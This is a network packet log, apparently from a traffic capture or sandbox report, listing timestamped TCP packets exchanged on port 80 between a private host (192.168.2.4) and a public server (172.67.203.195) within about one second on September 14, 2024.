Sep 14, 2024 18:31:14.751657009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751688004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751708031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.751739025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751771927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751796961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.751826048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751887083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751900911 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.751930952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751965046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751988888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752038002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752069950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752089977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752120972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752151966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752172947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752207041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752238989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752262115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752293110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752325058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752343893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752374887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752408028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752430916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752460957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752494097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752515078 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752547026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752578974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752599001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752634048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752665043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752686024 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752716064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752748966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752769947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752799988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752832890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752852917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752883911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752917051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.752937078 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.752968073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753001928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753036022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753060102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753098011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753110886 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753143072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753176928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753197908 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753232956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753261089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753281116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753312111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753345013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753376961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753407955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753441095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753460884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753494024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753526926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753547907 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753577948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753611088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753631115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753660917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753693104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753712893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753741980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753772974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753798962 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753829002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753860950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753881931 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753912926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753945112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.753964901 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.753995895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.754030943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.754050016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.797071934 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.803504944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.803617954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.803648949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.803682089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.803735018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.803767920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.803797007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.803833961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.803854942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.803905964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.803940058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.803962946 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804013014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804045916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804066896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804097891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804147959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804172039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804203987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804238081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804265022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804291964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804323912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804358006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804378033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804415941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804435968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804465055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804497957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804521084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804549932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804584026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804604053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804632902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804667950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804687977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804718971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804752111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804771900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804802895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804833889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804853916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.804888010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.804943085 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.836895943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.836940050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837019920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837049961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837106943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837160110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837184906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837218046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837251902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837275028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837307930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837342024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837364912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837416887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837450981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837472916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837522030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837577105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837594986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837646961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837681055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837702036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837732077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837765932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837798119 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837826014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837860107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837881088 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837912083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837944031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.837964058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.837995052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838042974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.838067055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838146925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838202000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.838231087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838285923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838319063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838340998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.838371992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838406086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838426113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.838458061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838490009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838510036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.838560104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838597059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838618040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.838648081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838680983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838702917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.838733912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838766098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838818073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838855982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.838855982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.838895082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838927031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838962078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.838983059 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839013100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839045048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839066029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839097023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839131117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839152098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839184046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839217901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839243889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839273930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839308023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839327097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839358091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839416027 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839437008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839487076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839520931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839540958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839574099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839607000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839628935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839659929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839694023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839715958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839746952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839778900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839798927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839828014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839859962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839881897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839914083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839946032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.839967012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.839998007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840029001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840048075 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.840080023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840111971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840132952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.840163946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840195894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840215921 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.840250015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840281963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840301991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.840332985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840364933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840388060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.840420961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840455055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840476990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.840507030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840540886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840562105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.840593100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.840646029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.883305073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.883349895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.883435965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.883479118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.883517027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.883552074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.883578062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.883613110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.883646011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.883682966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.883706093 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.884048939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.890373945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890433073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890487909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890511036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.890564919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890621901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890656948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.890678883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890731096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.890799046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890832901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890866995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890917063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.890942097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890975952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.890997887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891048908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891083956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891107082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891138077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891189098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891202927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891235113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891268969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891289949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891320944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891355038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891377926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891443968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891475916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891498089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891529083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891561985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891583920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891614914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891648054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891668081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891696930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891731024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891752005 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891784906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891833067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.891879082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891915083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891949892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.891969919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.923835993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.923877954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.923989058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924026012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.924057961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.924113035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924170971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924206018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924227953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.924280882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924335003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924374104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.924392939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924457073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924473047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.924505949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924540043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924561024 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.924612999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924679995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924695015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.924751043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924782038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924803019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.924853086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924887896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924911976 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.924947023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.924982071 CEST	80	49738	172.67.203.195	192.168.2.4
